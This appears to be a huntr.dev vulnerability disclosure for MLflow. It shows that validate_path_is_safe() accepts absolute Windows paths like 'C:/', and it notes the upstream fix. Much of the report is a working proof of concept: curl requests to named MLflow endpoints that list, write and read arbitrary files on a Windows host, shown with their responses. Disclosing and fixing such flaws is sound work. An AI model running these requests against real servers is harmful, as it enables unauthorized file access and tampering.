Multiple path traversals on Windows hosts in mlflow/mlflow
Reported on
Apr 28th 2023
Description
The validate_path_is_safe() function in /mlflow/server/handlers.py, introduced in PR #7891 on Feb 24th, 2023, does not account for the Windows absolute path format. It can therefore be bypassed on MLflow servers running on Windows hosts, exposing them to a number of high-impact directory traversals.
The code of the affected validate_path_is_safe() function is shown below:
_OS_ALT_SEPS = [sep for sep in [os.sep, os.path.altsep] if sep is not None and sep != "/"]
def validate_path_is_safe(path):
    """
    Validates that the specified path is safe to join with a trusted prefix. This is a security
    measure to prevent path traversal attacks.
    """
    if (
        any((s in path) for s in _OS_ALT_SEPS)
        or ".." in path.split(posixpath.sep)
        or posixpath.isabs(path)
    ):
        raise MlflowException(f"Invalid path: {path}", error_code=INVALID_PARAMETER_VALUE)
The function implements 3 separate checks:
- path must not contain separators other than forward slash (/): any((s in path) for s in _OS_ALT_SEPS)
- path must not contain relative parent directory meta symbols (..): ".." in path.split(posixpath.sep)
- path must not be an absolute posix path: posixpath.isabs(path)
By supplying an absolute Windows path with forward slash (/) separators, all of the above checks can be bypassed:
# Python 3.9.6 on Windows 10 Pro x64 Build 19045
>>> import os
>>> import posixpath
>>> test_path = 'C:/some/abs/path'
>>>
>>> _OS_ALT_SEPS = [sep for sep in [os.sep, os.path.altsep] if sep is not None and sep != "/"]
>>>
>>> any((s in test_path) for s in _OS_ALT_SEPS)
False
>>> ".." in test_path.split(posixpath.sep)
False
>>> posixpath.isabs(test_path)
False
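The session above needs a Windows host. As a rough, platform-independent sketch of the same bypass, the standard-library ntpath module (the Windows flavour of os.path, importable on any OS) can stand in for it. The names WINDOWS_ALT_SEPS and passes_original_checks, and the trusted prefix C:\srv\mlruns\artifacts, are illustrative assumptions and not part of MLflow:

```python
import ntpath
import posixpath

# Assumption: on Windows os.sep is "\\" and os.path.altsep is "/",
# so the _OS_ALT_SEPS filter from the report leaves only "\\".
WINDOWS_ALT_SEPS = ["\\"]


def passes_original_checks(path):
    """Hypothetical helper: True if the three checks from the report would NOT raise."""
    return not (
        any(s in path for s in WINDOWS_ALT_SEPS)
        or ".." in path.split(posixpath.sep)
        or posixpath.isabs(path)
    )


test_path = "C:/some/abs/path"

# The validator accepts the path...
print(passes_original_checks(test_path))
# ...although Windows path semantics treat it as absolute...
print(ntpath.isabs(test_path))
# ...so joining it onto a trusted prefix discards the prefix entirely.
print(ntpath.join("C:\\srv\\mlruns\\artifacts", test_path))
```

The last line illustrates why an accepted drive-letter path is dangerous: a Windows-style join keeps only the attacker-supplied path.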
Consequently, an attacker can perform directory traversals in any request handler that uses validate_path_is_safe() to validate user-supplied paths.
The validate_path_is_safe() function is used by 7 separate endpoints in the mlflow/server/handlers.py file, which allow the attacker to perform these actions:
List files in directory:
- _list_artifacts()#910, mapped to GET /ajax-api/2.0/mlflow/artifacts/list
- _list_artifacts_mlflow_artifacts()#1707, mapped to GET /ajax-api/2.0/mlflow-artifacts/artifacts
Download arbitrary file:
- get_artifact_handler()#545, mapped to GET /get-artifact
- _download_artifact()#1655, mapped to GET /ajax-api/2.0/mlflow-artifacts/artifacts/PATH
- get_model_version_artifact_handler()#1429, mapped to GET /model-versions/get-artifact
Write arbitrary file:
- _upload_artifact()#1680, mapped to PUT /ajax-api/2.0/mlflow-artifacts/artifacts/PATH
Delete arbitrary file:
- _delete_artifact_mlflow_artifacts()#1731, mapped to DELETE /ajax-api/2.0/mlflow-artifacts/artifacts
Combined, these actions give an attacker essentially full control over the server's file system and allow them to compromise the confidentiality, integrity, and availability of the user data held on the MLflow server.
Proof of Concept
Setup
On Windows
Prerequisites: Python 3 installed on the machine
Install the latest version of mlflow:
C:\Temp> pip install mlflow
Clone the mlflow repository into a local directory:
C:\Temp> git clone https://github.com/mlflow/mlflow
Run one of the example mlflow scripts, e.g. examples/shap/explainer_logging.py, to populate the mlruns directory:
C:\Temp> cd C:\Temp\mlflow\examples\shap
C:\Temp\mlflow\examples\shap> pip install scikit-learn shap matplotlib
C:\Temp\mlflow\examples\shap> python explainer_logging.py
Run the server on the Windows machine and expose it on all network interfaces:
C:\Temp\mlflow\examples\shap> mlflow server --host 0.0.0.0
On Linux
Assuming that the Windows machine's external IP address is 10.0.0.1:
$ export MLFLOW_SERVER_IP=10.0.0.1
List the existing runs on the MLflow server. Use "experiment_ids": ["0"] to get the default experiment. Save the run_uuid value for later use:
# CURL request:
curl -X 'POST' -H 'Content-Type: application/json' -d '{"experiment_ids": ["0"]}' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow/runs/search"
# Response:
{
  "runs": [
    {
      "info": {
        "run_uuid": "POC_RUN_ID",
        ...
      }
    }
  ]
}
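For readers who prefer scripting this step, the same request can be sketched with Python's standard library. This is only an illustration of the curl call above: build_search_request and extract_run_ids are hypothetical helper names, and the response shape is assumed to match the excerpt shown.

```python
import json
import urllib.request


def build_search_request(server_ip, experiment_ids=("0",)):
    """Hypothetical helper: build the POST request sent by the curl command."""
    body = json.dumps({"experiment_ids": list(experiment_ids)}).encode("utf-8")
    return urllib.request.Request(
        f"http://{server_ip}:5000/ajax-api/2.0/mlflow/runs/search",
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def extract_run_ids(response_body):
    """Hypothetical helper: collect every run_uuid from a runs/search response."""
    payload = json.loads(response_body)
    return [run["info"]["run_uuid"] for run in payload.get("runs", [])]


# Usage against a reachable test server (left commented out on purpose):
# with urllib.request.urlopen(build_search_request("10.0.0.1")) as resp:
#     print(extract_run_ids(resp.read()))
```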
Create a new model:
# CURL request:
curl -X 'POST' -H 'Content-Type: application/json' -d '{"name":"POC_MODEL_NAME"}' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow/registered-models/create"
Create a new model version by supplying the previously obtained run ID:
# CURL request:
curl -X 'POST' -H 'Content-Type: application/json' -d '{"name":"POC_MODEL_NAME","source":"runs:/POC_RUN_ID"}' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow/model-versions/create"
Exploitation
Use the obtained IDs to trigger the following LFI actions:
List files (path value is set to "C:/" in the examples below):
- Request to /ajax-api/2.0/mlflow/artifacts/list:
# CURL request:
curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow/artifacts/list?run_uuid=POC_RUN_ID&path=C:/"
# Response:
{
  "root_uri": "file:///C:/Users/Strawberry/Desktop/projects/mlflow/examples/shap/mlruns/0/POC_RUN_ID/artifacts",
  "files": [
    { "path": "../../../../../../../../../..", "is_dir": true },
    { "path": "../../../../../../../../../../../Program Files", "is_dir": true },
    { "path": "../../../../../../../../../../../Windows", "is_dir": true },
    ...
  ]
}
- Request to /ajax-api/2.0/mlflow-artifacts/artifacts:
# CURL request:
curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"
# Response:
{
  "files": [
    { "path": "..", "is_dir": true },
    ...
    { "path": "Program Files", "is_dir": true },
    { "path": "Program Files (x86)", "is_dir": true },
    { "path": "ProgramData", "is_dir": true },
    { "path": "Recovery", "is_dir": true },
    { "path": "System Volume Information", "is_dir": true }
  ]
}
Write file (path value is set to "C:/temp/poc.txt" in the examples below):
- Request to /ajax-api/2.0/mlflow-artifacts/artifacts/PATH:
# CURL request:
curl -X 'PUT' -d 'this is write poc' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts/C:/temp/poc.txt"
# Response:
{}
Read file (path value is set to "C:/temp/poc.txt" in the examples below):
- Request to /get-artifact:
# CURL request:
curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/get-artifact?path=C:/temp/poc.txt&run_uuid=POC_RUN_ID"
# Response:
this is write poc
- Request to /ajax-api/2.0/mlflow-artifacts/artifacts/PATH. Could not be reproduced, gives the following error:
# CURL request:
curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts/C:/temp/poc.txt"
# Response:
{"error_code": "INTERNAL_ERROR", "message": "The following failures occurred while downloading one or more artifacts from ./mlartifacts: {'C:/temp/poc.txt': 'SameFileError(\"\\'C:\\\\\\\\\\\\\\\\temp\\\\\\\\\\\\\\\\poc.txt\\' and \\'C:/temp/poc.txt\\' are the same file\")'}"}
- Request to /model-versions/get-artifact:
# CURL request:
curl -X 'GET' "http://$MLFLOW_SERVER_IP:5000/model-versions/get-artifact?path=C:/Temp/poc.txt&run_uuid=POC_RUN_ID&name=POC_MODEL_NAME&version=1"
# Response:
this is write poc
Delete file (path value is set to "C:/temp/poc.txt" in the examples below):
- Request to /ajax-api/2.0/mlflow-artifacts/artifacts. Could not be reproduced, gives the following error:
# CURL request:
curl -X 'DELETE' "http://$MLFLOW_SERVER_IP:5000/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/temp/poc.txt"
# Response:
<!doctype html>
<html lang=en>
<title>405 Method Not Allowed</title>
<h1>Method Not Allowed</h1>
<p>The method is not allowed for the requested URL.</p>
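The query-string based requests above all follow the same pattern, so their URLs can be assembled programmatically. The following is a small sketch, not part of the original PoC: traversal_url is a hypothetical helper, and it percent-encodes the path value (":" and "/"), which is assumed to be decoded by the server to the same string the curl commands send.

```python
from urllib.parse import urlencode


def traversal_url(server_ip, endpoint, **params):
    """Hypothetical helper: build a PoC URL for a query-string based endpoint."""
    # urlencode percent-encodes reserved characters such as ":" and "/".
    return f"http://{server_ip}:5000{endpoint}?{urlencode(params)}"


list_url = traversal_url(
    "10.0.0.1",
    "/ajax-api/2.0/mlflow/artifacts/list",
    run_uuid="POC_RUN_ID",
    path="C:/",
)
read_url = traversal_url(
    "10.0.0.1",
    "/get-artifact",
    path="C:/temp/poc.txt",
    run_uuid="POC_RUN_ID",
)

print(list_url)
print(read_url)
```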
Impact
The flawed path validation can be abused by an attacker to bypass existing security controls on Windows hosts and essentially achieve full control over the underlying host's filesystem, through a number of directory traversals that allow listing, reading, writing, and deleting files using absolute Windows file paths.
An attacker can leverage this control over the filesystem to compromise the confidentiality, integrity, and availability of the MLflow user data present on the vulnerable machine.
Occurrences
handlers.py L524
Code of the flawed validate_path_is_safe() function. Source of the bug.
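As an illustration of how the missing case could be covered, the sketch below adds a Windows-aware check on top of the three original ones. It is an assumption-laden example and not necessarily how the project addressed the issue: is_path_safe_sketch is a hypothetical name, it returns a boolean instead of raising MlflowException, and it rejects backslashes and drive letters on every host OS rather than only on Windows.

```python
import ntpath
import posixpath


def is_path_safe_sketch(path):
    """Hypothetical stricter check: False if the path should be rejected."""
    # Reject backslash separators regardless of the host OS.
    if "\\" in path:
        return False
    # Reject parent-directory components.
    if ".." in path.split(posixpath.sep):
        return False
    # Reject POSIX absolute paths such as "/etc/passwd".
    if posixpath.isabs(path):
        return False
    # Reject anything carrying a Windows drive such as "C:/temp" or "C:temp".
    drive, _ = ntpath.splitdrive(path)
    if drive or ntpath.isabs(path):
        return False
    return True


for candidate in ["model/MLmodel", "C:/temp/poc.txt", "../secret", "/etc/passwd"]:
    print(candidate, is_path_safe_sketch(candidate))
```

Using ntpath directly, instead of os.path, keeps the behaviour identical on Linux and Windows hosts, at the cost of also rejecting relative names that merely look like a drive-qualified path.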
@admin can we add a co-author to this report? https://huntr.dev/users/nashkersk/
Also, this vulnerability was fixed in https://github.com/mlflow/mlflow/pull/8999 by @serena-ruan
@admin Sorry I put the wrong sha, can we update with 0f2ad0236e355b0816a06670eccf69f57551fa2d ?